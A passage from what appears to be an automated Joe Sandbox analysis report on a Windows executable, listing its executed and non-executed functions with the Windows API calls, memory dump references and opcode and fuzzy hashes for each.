                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                              • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                              • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                              • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                              Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                              • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                              • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                              • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                              Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                              • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                              • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                              • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                              Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage
                                                              • String ID:
                                                              • API String ID: 1306739567-0
                                                              • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                              • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                              • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                              • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                              Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEndOfFile.KERNEL32(?,02118000,0040AA59,00000000), ref: 004076B3
                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021003AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLast
                                                              • String ID:
                                                              • API String ID: 734332943-0
                                                              • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                              • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                              • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                              • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                              Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                              • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                              • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                              • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                              Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                              • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                              • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                              • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                              Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharPrev
                                                              • String ID:
                                                              • API String ID: 122130370-0
                                                              • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                              • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                              • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                              • Instruction Fuzzy Hash:
                                                              Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                              • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                              • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                              • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                              Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                              • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                              • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                              • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                              Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                              • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                              • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                              • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                              Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                              • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                              • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                              • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654

                                                              Non-executed Functions

                                                              Function 00409448 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                              • String ID: SeShutdownPrivilege
                                                              • API String ID: 107509674-3733053543
                                                              • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                              • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                              • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                              • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                              Function 00409C34 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                              • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                              • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                              • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                              • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                              • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                              Function 00405258 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                              • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                              • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                              • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                              Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: SystemTime
                                                              • String ID:
                                                              • API String ID: 2656138-0
                                                              • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                              • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                              • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                              • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                              Function 00405CF4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                              • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                              • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                              • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                              Function 0040840C Relevance: .5, Instructions: 545COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                              • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                              • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                              • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                              Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseHandleModuleProc
                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                              • API String ID: 4190037839-2401316094
                                                              • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                              • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                              • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                              • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                              Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                              • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3333815803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.3333777840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333856766.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.3333890019.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
